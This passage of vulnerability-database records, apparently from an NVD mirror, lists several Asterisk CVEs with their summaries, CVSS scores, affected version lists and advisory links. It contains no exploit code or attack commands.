        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-01-29T08:15:10.520",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2020-003.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2020-004.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29191"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29219"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2020-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2020-004.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29191"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29219"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-11-24 15:59

Modified

2024-11-21 02:19

Severity ?

Summary

Race condition in the chan_pjsip channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 allows remote attackers to cause a denial of service (assertion failure and crash) via a cancel request for a SIP session with a queued action to (1) answer a session or (2) send ringing.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-015.html	Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-015.html	Vendor Advisory

Impacted products

	Vendor	Product	Version
	digium	asterisk	*
	digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F21F0B73-A30F-4673-B3A8-D9F456FFCEF2",
              "versionEndExcluding": "12.7.1",
              "versionStartIncluding": "12.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0C83CD93-7CBA-4FF0-B29E-A509F4A3D5E2",
              "versionEndExcluding": "13.0.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Race condition in the chan_pjsip channel driver in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 allows remote attackers to cause a denial of service (assertion failure and crash) via a cancel request for a SIP session with a queued action to (1) answer a session or (2) send ringing."
    },
    {
      "lang": "es",
      "value": "Condici\u00f3n de carrera en el controlador de canales chan_pjsip en Asterisk Open Source 12.x anterior a 12.7.1 y 13.x anterior a 13.0.1 permite a atacantes remotos causar una denegaci\u00f3n de servicio (fallo de aserci\u00f3n y ca\u00edda) a trav\u00e9s de una solicitud cancel para una sesi\u00f3n SIP con una acci\u00f3n en cola para (1) responder a una sesi\u00f3n o (2) enviar tonos de llamada."
    }
  ],
  "id": "CVE-2014-8415",
  "lastModified": "2024-11-21T02:19:02.417",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-24T15:59:07.327",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-015.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-015.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-04-18 22:14

Modified

2024-11-21 02:06

Severity ?

Summary

The PJSIP channel driver in Asterisk Open Source 12.x before 12.1.1, when qualify_frequency "is enabled on an AOR and the remote SIP server challenges for authentication of the resulting OPTIONS request," allows remote attackers to cause a denial of service (crash) via a PJSIP endpoint that does not have an associated outgoing request.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-003-12.diff	Patch
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-003.html	Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-23210
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-003-12.diff	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-003.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-23210

Impacted products

Vendor	Product	Version
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F3DE062D-4E87-4691-A664-D9E7C02036EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The PJSIP channel driver in Asterisk Open Source 12.x before 12.1.1, when qualify_frequency \"is enabled on an AOR and the remote SIP server challenges for authentication of the resulting OPTIONS request,\" allows remote attackers to cause a denial of service (crash) via a PJSIP endpoint that does not have an associated outgoing request."
    },
    {
      "lang": "es",
      "value": "El controlador de canal PJSIP en Asterisk Open Source 12.x anterior a 12.1.1, cuando qualify_frequency \"est\u00e1 habilitado en un AOR y el servidor SIP remoto desaf\u00eda para autenticaci\u00f3n de la solicitud OPTIONS resultante,\" permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda) a trav\u00e9s de un Endpoint de PJSIP que no tiene una solicitud saliente asociada."
    }
  ],
  "id": "CVE-2014-2288",
  "lastModified": "2024-11-21T02:06:00.703",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-04-18T22:14:38.087",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-003-12.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-003.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23210"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-003-12.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23210"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-03-31 22:55

Modified

2024-11-21 01:25

Severity ?

Summary

manager.c in Asterisk Open Source 1.6.1.x before 1.6.1.24, 1.6.2.x before 1.6.2.17.2, and 1.8.x before 1.8.3.2 allows remote attackers to cause a denial of service (CPU and memory consumption) via a series of manager sessions involving invalid data.

References

URL	Tags
secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2011-003.html	Vendor Advisory
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html
secalert@redhat.com	http://openwall.com/lists/oss-security/2011/03/17/5
secalert@redhat.com	http://openwall.com/lists/oss-security/2011/03/21/12
secalert@redhat.com	http://securitytracker.com/id?1025223
secalert@redhat.com	http://www.debian.org/security/2011/dsa-2225
secalert@redhat.com	http://www.securityfocus.com/bid/46897
secalert@redhat.com	http://www.vupen.com/english/advisories/2011/0686	Vendor Advisory
secalert@redhat.com	http://www.vupen.com/english/advisories/2011/0790	Vendor Advisory
secalert@redhat.com	https://bugzilla.redhat.com/show_bug.cgi?id=688675
secalert@redhat.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/66139
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-003.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html
af854a3a-2127-422b-91ae-364da2661108	http://openwall.com/lists/oss-security/2011/03/17/5
af854a3a-2127-422b-91ae-364da2661108	http://openwall.com/lists/oss-security/2011/03/21/12
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1025223
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2225
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/46897
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/0686	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/0790	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://bugzilla.redhat.com/show_bug.cgi?id=688675
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/66139

Impacted products

Vendor	Product	Version
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.1
digium	asterisk	1.6.1.2
digium	asterisk	1.6.1.3
digium	asterisk	1.6.1.4
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.6
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.8
digium	asterisk	1.6.1.9
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.11
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.14
digium	asterisk	1.6.1.15
digium	asterisk	1.6.1.16
digium	asterisk	1.6.1.17
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.21
digium	asterisk	1.6.1.22
digium	asterisk	1.6.1.23
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17.1
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBFF2686-0F5C-4F20-AA93-6B63C5ADCD82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "6D4A9B22-7978-44F3-A30C-65FE7024AB6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "06219062-9CAD-49D2-823E-E11E74B131D8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "91420C0D-C63B-4916-8335-6BE24EB738FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "FD1D7D08-AC94-49AC-9F16-A6E91F1F1EEE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "05FDA8EA-6610-4D49-9825-34EBFAAD2691",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8FE4BCF-9AE7-4F41-BA84-E9537CC1EBE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B0D15-7C09-4BBB-AC84-A1898F448DB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F259057F-3720-45D8-91B4-70A11B759794",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "A106C460-4CE2-4AC3-B2FD-310F05507511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "3E119FF9-2AD3-450D-8BBF-C6DD063246EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "759221D5-FC37-446D-9628-233B8D0B9120",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F82D4812-0429-42D4-BD27-C76CB9E7C368",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8FE11D6-8C0A-450E-B6DA-3AFE04D82232",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FBCC8-4637-4A67-BFFD-C052C3C03C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7307E10-9FA5-4940-B837-7936384F61DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3D0DC9D6-D4D6-46CB-98DA-F4FC1835B6B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBBD0747-F3FF-46D8-A3C4-8268E37BC5AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3F759F27-008E-47FB-AC0A-EF11DA19918E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D15C82BA-BD1F-4A19-A907-E6C30042F537",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E802481-C8BD-4218-8CDC-5DB112DA946C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6FC8A53-E3C0-4660-BE75-2B5B8B4F8160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C020CD-D0EA-4B3E-B33C-F900B08B28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0004AADE-1652-4242-A97D-E9818FE03CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "543E9C91-60FE-43AE-9B94-08DD730BA814",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "252849FA-F46E-4F5A-A488-AA53574CA884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EB89B4F-9546-4DF0-B69F-1B9F289BB1E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E254415-1D59-4A77-80FB-AE3EF10FBB32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF2407D0-C324-45C4-9FBB-4294F747DBDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "F23A36CC-9AA2-4559-946D-6D0621664342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "89C40652-E180-416A-B88A-E6313530E98A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "A28C2C5D-A573-4036-A600-BE28A3E417B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.15:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EE162390-359F-4C5D-902B-275FB1FC3EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0A3750-0D34-4FB5-B897-17CA0D0B7CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "D11BE58D-5B7E-4BB5-988A-7FC2E4B92C4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "22631AE6-5DA1-46C6-A239-C232DA0D0E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9F5CB8CC-4CC1-4A1B-8AD1-C876D1BC80EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8591DB43-EAA0-4D58-BA23-EAD916DEA3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "4E4747F8-1AFC-4AEF-82D8-D6604FB5222E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B82172C9-EA5B-4FC9-A445-0A297AE56FF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0C71CDAB-A299-4F1D-942D-851C899E63BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E2FA9AB9-4C83-45A3-9772-3A16030DBF1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "A88C639A-9229-4D99-9087-1B0B95539BD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B7DE987-7351-495A-8776-37E6B7BF0C0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CB5823CC-941F-47AB-AD1F-325181D40E60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "712AF374-846D-4F21-91C4-1BA9AB33E46D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "E431AF4E-C6A8-424F-9205-01F5FDFB3306",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "52BE29C5-C2C3-4414-A8E1-4D4D926F6E65",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
